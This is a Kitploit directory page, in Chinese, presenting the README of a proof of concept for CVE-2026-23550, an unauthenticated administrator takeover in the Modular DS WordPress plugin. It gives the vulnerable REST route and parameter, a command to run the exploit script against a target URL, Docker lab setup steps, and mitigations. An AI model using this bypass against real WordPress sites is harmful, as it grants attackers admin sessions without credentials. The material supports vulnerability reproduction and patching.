Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Modular DS WordPress 插件 **未认证管理员访问** | Kitploit
工具/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试身份验证
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress 插件 **未认证管理员访问**

查看仓库
17个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress 插件 未认证管理员访问

Status CVSS Affected

概念验证(PoC),演示 CVE-2026-23550 - Modular DS WordPress 插件(版本 ≤2.5.1)中的严重未认证管理员账户接管漏洞。已在野外被积极利用。

PoC 流程图

攻击摘要:/api/modular-connector/login 中缺陷的 REST API 路由在 origin=mo 时绕过 WordPress 认证,授予未认证管理员会话 Cookie。

🚀 快速演示 - 如果您已配置好 WP

root@kitploit:~
# 生产就绪 PoC
./CVE-2026-23550-PoC.sh http://target.com

输出:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector 漏洞利用测试
[+] 存在漏洞:已签发管理员会话 Cookie

技术说明:

受影响的 REST 端点仅可通过 ?rest_route= 机制访问;通过 /wp-json/ 直接访问可能不可用。该漏洞允许在无需凭据或 nonce 验证的情况下进行未认证访问。成功签发 WordPress 管理员会话 Cookie 即构成漏洞利用确认。此概念验证不执行任何管理操作。测试时使用 Modular DS 版本 2.5.0。


⚙️ 复现步骤:

步骤 1:实验室目录

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

步骤 2:Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

步骤 3:部署

root@kitploit:~
docker compose up -d
docker compose logs -f db

等待:"ready for connections"

步骤 4:WordPress 安装

  • URL:http://localhost:8080
  • 管理员用户:admin
  • 密码:admin123
  • 站点标题:任意内容

步骤 5:验证 REST(重要)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

预期结果:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

如果此步骤失败 → 停止,环境已损坏。

步骤 6:安装存在漏洞的插件

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

步骤 7:激活插件

  • http://localhost:8080/wp-admin/plugins.php
  • 激活 Modular Connector
  • 忽略引导提示

步骤 8:漏洞利用

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

注意:如果您希望将 Cookie 保存到文本文件中,请从 poc.sh 文件中删除 "rm -f "$COOKIE_JAR""。

🛡️ 缓解措施

  • 立即:停用 Modular DS 插件
  • 补丁:升级至 2.5.2+
  • 审计:检查是否存在未授权管理员用户
  • WAF:阻止 ?rest_route=/api/modular-connector/login

📄 许可证

MIT 许可证 - 仅用于安全研究和授权渗透测试。 禁止恶意使用。请负责任地披露。

🚨 法律声明

此 PoC 仅用于授权安全测试。未经授权对生产系统使用属违法行为。请向插件维护者报告发现的问题。

下载工具